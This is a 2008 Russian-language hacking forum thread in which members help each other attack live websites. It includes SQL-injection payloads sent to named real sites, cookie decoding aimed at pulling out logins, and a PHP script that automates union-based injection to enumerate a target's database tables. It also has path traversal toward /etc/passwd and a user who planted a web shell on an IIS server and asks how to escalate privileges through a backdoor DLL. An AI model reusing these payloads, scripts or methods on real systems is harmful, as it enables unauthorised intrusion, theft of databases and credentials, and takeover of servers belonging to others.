Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    Как под gnix заставить интерпретировать php как gif файлы?
     
    1 person likes this.
  2. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    надо прописать в конфиге, что все расширения .gif исполнялются как PHP.
     
    #2202 sabe, 1 Jun 2008
    Last edited: 1 Jun 2008
  3. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Народ, ктонить разъясните ошибку :


    ERROR
    Stored procedure execution failed with error!
    Type: [object Error]
    Number: -2147217900
    Description: ORA-06550: line 1, column 74: PLS-00103: Encountered the symbol ">" when expecting one of the following: . ( ) , * @ % & = - + < / > at in is mod remainder not rem <показатель (**)> <> or != or ~= >= <= <> and or like LIKE2_ LIKE4_ LIKEC_ between || multiset member SUBMULTISET_ ORA-06550: line 1, column 125: PLS-00103: Encountered the symbol "END"

    Судя по всему Оракл:Р,ругающийся на что-то :

    POST /remind.asp HTTP/1.0
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
    Host: requiem-online.ru
    Content-Length: 75
    Cookie: ASPSESSIONIDCQDCCAAB=IHFAIINBBIGEAIAPBPHDIJEA;dtm%5F%5Fret%5Fp=Mon+Jun+2+13%3A33%3A10+UTC%2B0400+2008;cur%5Fdtm%5Fret%5Fp=1
    Connection: Close
    Pragma: no-cache
    Acunetix-Product: WVS/5.5 (Acunetix Web Vulnerability Scanner - NORMAL)
    Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED
    Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm

    remind_action=1&usr_email='&[email protected]

    Сканер выдал полноценную инъекцию,но я ему не верю =_=.Смахивает на какую-то ошибку в приложении)


    remind_action=1&[email protected]'+%7C%7C+'1%3D0'/**/&[email protected]

    В том же скрипте,если передать это с определённым количеством кавычек,то выдаст:

    ADODB.Command error '800a0d5d'

    Application uses a value of the wrong type for the current operation.

    /./include/inc_remind.asp, line 26

    Но больше ничё не меняется.
     
    #2203 Велемир, 2 Jun 2008
    Last edited: 2 Jun 2008
  4. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.tafy.ro/magazin.asp?action=add&item=32&count=-1'
    собственно сайт
    выдает вот это:
    Microsoft VBScript runtime error '800a000d'

    Type mismatch: 'CInt'

    /magazin.asp, line 213
     
  5. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    Как можно в ipb узнать установочный путь? версия 2.1.7
     
  6. AARON

    AARON Elder - Старейшина

    Joined:
    29 Apr 2008
    Messages:
    62
    Likes Received:
    14
    Reputations:
    1
    Скажите, а куки с mybb.ru расшифровать как-то возможно?

    Mnw1OWIxOWVkYTE1MTkxYjRkOGRhMDNlMjg0MDVkZDVmNDcyMjc*****

    Это какой-то хеш?
     
  7. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    это base64. в расшифрованном выглядит как
    2|59b19eda15191b4d8da03e28405dd5f4722
     
    #2207 AFoST, 2 Jun 2008
    Last edited: 2 Jun 2008
    1 person likes this.
  8. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    какие знаете варианты добычи дампа бд через скуль?
     
  9. Lesnoy_chelovek

    Lesnoy_chelovek Elder - Старейшина

    Joined:
    6 Dec 2006
    Messages:
    224
    Likes Received:
    152
    Reputations:
    8
    sabe, хапай пароли админа, подулючайся через phpmyadmin или любой другой менеджер БД и делай дамп.
     
  10. AARON

    AARON Elder - Старейшина

    Joined:
    29 Apr 2008
    Messages:
    62
    Likes Received:
    14
    Reputations:
    1
    Ребят, все равно не могу разобраться с куки... Прочитал статью на форуме. По идее в моем расшифрованном куки дожен быть логин и хеш пароля. Получается полная галиматья. Моя задача именно извлечь логин\пароль. Кто-то это делал нормально?

    mybb_ru=Nnw2M2JjMWM4OGJjNTQ5YTAwMTFhYWQ5YmJkYmJkYjk1NmNhYjc1N2I2; MG_2445=5

    Тестовый юзверь. Логин AARON, пасс 12345
    Что бы я не делал я не могу получить не намека на логин и пасс...
     
    #2210 AARON, 3 Jun 2008
    Last edited: 3 Jun 2008
  11. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    Lesnoy_chelovek
    а запросом никак?
     
  12. mosquito

    mosquito New Member

    Joined:
    2 Jun 2008
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    нужна помощь по Microsoft-IIS/6.0

    добрый день, уважаемое сообщество!
    срочно нужна помощь в следующем:

    я кое-что сломал, но не до конца, залил туда шелл, но не могу попасть в некоторые директории и диски, пишет permissions denied

    мне необходимо поднять права юзера на Microsoft-IIS/6.0
    нужна dll-ка или софтина для увеличения привилегий

    или можно сделать изменением regedit - но нужно узнать где именно в реестре лежит ключ чтоб поднять права, путь до ключа по умолчанию HKEY_LOCAL_MACHINESoftwareMicrosoftWindows NTCurrenetVersionWinlogon, но в нашем случае он не там :(


    всем заранее спасибо за помощь.
     
  13. 0nep@t0p

    0nep@t0p Elder - Старейшина

    Joined:
    25 May 2007
    Messages:
    134
    Likes Received:
    216
    Reputations:
    17
    2 Sabe
    Ну если версия 5 ( если майскуль ) то можно вручную извлечь из всех таблиц всю инфу с БД, также есть много скриптов на пхп и перл для автоматизации этого процесса. В ином случае никак бд не слить
     
  14. z3r0cool

    z3r0cool Elder - Старейшина

    Joined:
    22 Apr 2008
    Messages:
    32
    Likes Received:
    11
    Reputations:
    0
    Поищи на секлабе по ключу "повышение привелегий", найдешь много интересного, да, не помешала бы версия форточек, включая SP.
     
    #2214 z3r0cool, 3 Jun 2008
    Last edited: 3 Jun 2008
  15. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    0nep@t0p
    припустим что 5. можно пример запроса? или скрипт для автоматизации :)
     
    1 person likes this.
  16. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    PHP:
    <?php  
    set_time_limit
    (0);  
    ignore_user_abort(true);   
    $s=1;  
    $f=39913;  
    $fph fopen ("result.txt"'a+');  

      for (
    $i=$s$i<=$f$i++) {  
        
    $aps file_get_contents("[твой сайт и путь до уязвимого скрипта]=-1+union+select+concat(0x3a3a3a,table_name,0x3a3a3a  )+from+information_schema.tables+limit+".$i.",1/*");  
        
    $res=null;  
          
       
    $pattern ="/:::(.+):::/";  
        
    preg_match_all($pattern$aps$out);  
        
    $res=array_values(array_unique($out[0]));  
        
    fputs ($fph$res[0]."\r\n");  
          
        
    sleep (5);  
    }  
    fclose ($fph);    
    ?>
    Незабудь подправить запрос соответсвенно нуждам
     
    1 person likes this.
  17. mosquito

    mosquito New Member

    Joined:
    2 Jun 2008
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Win Server 2003 R2
    SP2
     
  18. Demetra

    Demetra Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    48
    Likes Received:
    8
    Reputations:
    0
    а шо значит ошибка 406?пыталась попасть в etc путь вида p=../etc/домен/&f=passwd ,ниче страшного если так и оставить,или лучше и это фильтровать?
     
  19. Demetra

    Demetra Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    48
    Likes Received:
    8
    Reputations:
    0
    ошибку эту знаю,всмысле оно ж все равно не даст файл открыть,или можна попытатьса?
     
  20. mosquito

    mosquito New Member

    Joined:
    2 Jun 2008
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    нашел там в C:\Inetpub\wwwroot\da***\idq.dll, в которой прописан

    There will add a Administrators User "iisuser",Its Password is "ab007".If you want to enter cmd.exe shell,please use ispc.exe.

    как его запустить?
     
Thread Status:
Not open for further replies.